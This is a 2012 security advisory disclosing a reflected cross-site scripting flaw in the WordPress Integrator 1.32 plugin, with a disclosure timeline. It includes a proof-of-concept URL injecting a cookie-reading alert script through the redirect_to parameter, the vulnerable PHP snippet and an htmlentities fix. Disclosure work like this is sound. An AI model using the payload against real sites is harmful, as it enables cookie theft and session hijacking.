Advisory:		WordPress plugin 'WordPress Integrator 1.32' XSS vulnerability
Advisory ID:		SSCHADV2012-010
Author:			Stefan Schurtz
Affected Software:	Successfully tested on WordPress Integrator 1.32
Vendor URL:		http://wordpress.org/extend/plugins/wp-integrator/
Vendor Status:		informed
OSVDB ID:		80628

==========================
Vulnerability Description
==========================

The WordPress plugin 'WordPress Integrator 1.32' is prone to Cross-Site scripting vulnerability

==================
PoC-Exploit
==================

http://[target]/wordpress/wp-login.php?redirect_to=http://%3F1alert(document.cookie)&reauth=1

// vulnerable code in wp-integrator.php

function init_handler() {
                $url = parse_url($_SERVER["REQUEST_URI"]);

=========
Solution
=========

function init_handler() {
                $url = parse_url(htmlentities($_SERVER["REQUEST_URI"]));

====================
Disclosure Timeline
====================

19-Mar-2012 - vendor informed
20-Mar-2012 - informed plugins@wordpress.org

========
Credits
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References
===========

http://www.darksecurity.de/advisories/2012/SSCHADV2012-010.txt
http://osvdb.org/show/osvdb/80628